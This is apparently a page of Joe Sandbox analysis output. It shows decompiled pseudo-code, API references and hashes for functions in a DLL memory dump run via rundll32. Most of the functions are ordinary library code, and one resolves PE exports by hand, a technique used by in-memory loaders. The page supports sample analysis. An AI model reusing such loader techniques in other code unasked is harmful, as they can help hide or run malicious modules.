Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
Instruction ID: 72b3b778e8896de6b9c4d2b5d37ea691cdfdc38a5381d0430ce67680fa501abd
Opcode Fuzzy Hash: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
Instruction Fuzzy Hash: 5931F572A0065A9FFB10CF78CCC6AAE7BB5EB44384F25052AE506EB1C5D730EA45C750

Uniqueness

Uniqueness Score: -1.00%

Function 1000D86F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E1000D86F(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E1000D6C3() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E100199D4(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x1005a760(_a4, _a8);
			}

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000D8AD
GetSystemMetrics.USER32 ref: 1000D8C5
GetSystemMetrics.USER32 ref: 1000D8CC

Strings

DISPLAY, xrefs: 1000D8E9
B, xrefs: 1000D88C

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
Instruction ID: 9954a119ce47e65a3950f6e4b3e830268b9633322f26d87d987c4675ad6ec402
Opcode Fuzzy Hash: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
Instruction Fuzzy Hash: 7C118F71600328ABEB11EF649C84B9F7EA8EF057D0B108066FD09AA14AD6719951CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 1000C570, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C570(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E1000DFD6(__ecx, __eflags, _t26) == 0) {
					_t10 = E1001040B(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E1000E426(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E100140D6(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

Strings

Edit, xrefs: 1000C5C0

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
Instruction ID: c36f5ccd8b34139a66e87801a9a5321a409f351d494de0105f07b228c10d2adb
Opcode Fuzzy Hash: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
Instruction Fuzzy Hash: F4015E3820070AA7FA65DB258D45F5AB6E5EF056D2F214429F942F10B8CFB0FD91D560

Uniqueness

Uniqueness Score: -1.00%

Function 1000BC89, Relevance: 7.6, APIs: 5, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1000BC89(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				void* _t43;
				void* _t44;
				char** _t54;
				void* _t55;
				void* _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x10057a08; // 0xfbf2b489
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E10017BF4(E10027F23, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						_push(_t59);
						E10009FA3(_t42, _t59 - 0x14, _t54, _t57, _t66);
						 *(_t59 - 4) = 1;
						_t57 = E1000BC89(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E10009CB7( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E100167D5(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 1000BCA8
RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1000BCC7
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BCE5
RegDeleteKeyA.ADVAPI32(?,?), ref: 1000BD60
RegCloseKey.ADVAPI32(?), ref: 1000BD6B

Part of subcall function 10009FA3: __EH_prolog3.LIBCMT ref: 10009FAA

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
String ID:
API String ID: 301487041-0
Opcode ID: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
Instruction ID: 653bf45c983c6aa9a2c45ec2c29e65d920d70d1e6a7a13c67c9db93679124605
Opcode Fuzzy Hash: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
Instruction Fuzzy Hash: 0921A075D0465A9FEB21DF94CC81AEDB7B0FF04390F104126ED55A7290EB705E44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10013F9E, Relevance: 7.6, APIs: 5, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10013F9E(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				int _t27;
				CHAR* _t28;
				signed int _t29;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x10057a08; // 0xfbf2b489
				_v8 = _t9 ^ _t29;
				_t21 = _a4;
				_t32 = _t21;
				_t28 = _a8;
				if(_t21 == 0) {
					L1:
					E1000A0DB(_t21, _t22, _t26, _t28, _t32);
				}
				if(_t28 == 0) {
					goto L1;
				}
				_t27 = lstrlenA(_t28);
				_v264 = 0;
				E100174D0(_t27,  &_v263, 0, 0xff);
				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
					_t16 = SetWindowTextA(_t21, _t28);
				}
				return E100167D5(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
			}

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 10013FC8
_memset.LIBCMT ref: 10013FE5
GetWindowTextA.USER32 ref: 10013FFF
lstrcmpA.KERNEL32(00000000,?), ref: 10014011
SetWindowTextA.USER32(?,?), ref: 1001401D

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
Instruction ID: fa7108181993de9b8ea87dd6eaa7291c2451852d429ff63cadea9d36e3b3e8b2
Opcode Fuzzy Hash: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
Instruction Fuzzy Hash: 3901C0B6A00228ABE711DB65DCC4FDF77ACEF18790F110065EA45D7141DA70DE848BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10010C0F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E10010C0F(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E1001431B(__ebx, _t25, __ebp, 0xc);
				_push(E100100DE);
				_t26 = E100139F5(__ebx, 0x1005a8e0, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E1000A0DB(_t21, 0x1005a8e0, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E10014388(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E1000E725(_t21, 0x1005a8e0, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

APIs

Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
Part of subcall function 1001431B: InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
Part of subcall function 1001431B: LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F

Part of subcall function 100139F5: __EH_prolog3_catch.LIBCMT ref: 100139FC

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 10010C53
FreeLibrary.KERNEL32(?), ref: 10010C63

Strings

hhctrl.ocx, xrefs: 10010C37
HtmlHelpA, xrefs: 10010C4D

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 2853499158-63838506
Opcode ID: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
Instruction ID: 8873b40b3358b87e9332ca8c9146562190e137befea279647b799a71fcd87530
Opcode Fuzzy Hash: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
Instruction Fuzzy Hash: 7001F431204303DFE321DFA1DE05B4A76E0EF05781F018A08F4DAA8061DBB1D8D0DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 100224E9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E100224E9() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x1002bb98;
					_v28 =  *0x1002bb90;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1001A130), ref: 100224EE
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 100224FE

Strings

KERNEL32, xrefs: 100224E9
IsProcessorFeaturePresent, xrefs: 100224F8

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
Instruction ID: b1380c49f8d15cda8b98f9f56e3724ed638b8beb480886d8724856f67b077174
Opcode Fuzzy Hash: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
Instruction Fuzzy Hash: EDF03030900D1EE2EF00ABE1BC596AF7A78FB44785FD20490E681B0088DF7181718681

Uniqueness

Uniqueness Score: -1.00%

Function 10002D50, Relevance: 6.4, APIs: 5, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002D50(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				signed short* _v36;
				intOrPtr _v40;
				void* _t79;
				void* _t119;

				_v40 = __ecx;
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v12 = 0;
				_v16 =  *_a4 + 0x78;
				if( *((intOrPtr*)(_v16 + 4)) != 0) {
					_v8 = _v20 +  *_v16;
					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
							_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x20));
							_v36 = _v20 +  *((intOrPtr*)(_v8 + 0x24));
							_v24 = 0;
							_v28 = 0;
							while(_v28 <  *((intOrPtr*)(_v8 + 0x18))) {
								_t79 = E10001F70(_a8, _v20 +  *_v32);
								_t119 = _t119 + 8;
								if(_t79 != 0) {
									_v28 = _v28 + 1;
									_v32 = _v32 + 4;
									_v36 =  &(_v36[1]);
									continue;
								}
								_v12 =  *_v36 & 0x0000ffff;
								_v24 = 1;
								break;
							}
							if(_v24 != 0) {
								L17:
								if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
									return _v20 +  *((intOrPtr*)(_v20 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
								}
								SetLastError(0x7f);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L17;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}

APIs

SetLastError.KERNEL32(0000007F), ref: 10002D7F
SetLastError.KERNEL32(0000007F), ref: 10002DAB

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
Instruction ID: 028074866867044f4bb64f701422ec5252acdb94d91fdee864382ef112f730bb
Opcode Fuzzy Hash: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
Instruction Fuzzy Hash: F7510570A4415AEFEF04CF94C880AAEB7F1FF48384F608569D855AB349D734EA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10023E83, Relevance: 6.1, APIs: 4, Instructions: 101
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10023E83(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E10016E2B( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E1001E243( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E10017D62(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10023EB3
__isleadbyte_l.LIBCMT ref: 10023EE7
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F18
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F86

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
Instruction ID: bc0a73e0192d900c1d89498958e44598309ec6eeb61669affd2269eacaf1277d
Opcode Fuzzy Hash: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
Instruction Fuzzy Hash: EA319931A0028AEFDF50DFA4E891AAE7BF9EF00251F92C5A9F4648B191D330E944DB50

Uniqueness

Uniqueness Score: -1.00%

Function 100145B9, Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E100145B9(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E1000D61F(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E1000D5EC(_t51, _t65, 0, _t77) + 4));
					_t70 = E100139DB(0x10058f44);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
